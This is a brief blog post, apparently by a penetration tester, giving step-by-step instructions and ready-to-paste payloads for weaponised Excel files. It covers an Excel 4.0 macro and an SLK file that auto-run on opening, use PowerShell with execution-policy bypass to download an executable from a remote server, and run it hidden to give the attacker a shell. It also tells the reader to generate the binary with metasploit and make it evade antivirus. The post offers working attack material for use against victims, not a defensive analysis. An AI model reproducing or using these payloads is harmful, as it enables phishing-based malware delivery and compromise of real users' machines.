Microsoft Excel Payload

Mar 26, 2022 1 min read

Blog • Mar 2022

Microsoft Excel Payload for initial foothold is old method but still widely used by APTs.

Microsoft Excel 4.0 Macro Payload

Right click on the workbook and click insert

Select MS Excel 4.0 Macro

paste following payload:

=EXEC("powershell.exe -ep Bypass -C invoke-webrequest 192.168.8.168:8000/20.exe -outfile c:\users\public\20.exe")
=WAIT(NOW()+"00:00:10")
=EXEC("powershell -ep Bypass -W Hidden c:\users\public\20.exe")
=HALT()

Now Select first cell and rename it to Auto_Open

Save as Excel 97-2003 Workbook(XLS)

When victim Enable Content We get shell

Microsoft Excel SLK Payload

Generate binary using metasploit. Make sure make it bypass AV.

Open Notepad and paste:

ID;P
O;E
NN;NAuto_open;ER101C1;KOut Flank;F
C;X1;Y101;K0;EEXEC("powershell.exe -ep Bypass -C invoke-webrequest 192.168.88.168:8000/20.exe -outfile c:\users\public\20.exe")
C;X1;Y102;K0;EWAIT(NOW()+"00:00:10")
C;X1;Y103;K0;EEXEC("powershell.exe c:\users\public\20.exe")
C;X1;Y104;K0;EHALT()
E

And Save ask Test.slk

When victim double click and Enable Content It downloads the binary and execute, as a result we get shell

Written by Jobyer Ahmed

Founder of Bytium, OSCE3-certified cybersecurity expert with deep experience in pentesting and vulnerability assessment.

PreviousPoshC2 Commands Reference NextRed Team Tools Collection

Microsoft Excel Payload

Microsoft Excel 4.0 Macro Payload

Microsoft Excel SLK Payload

Quick contact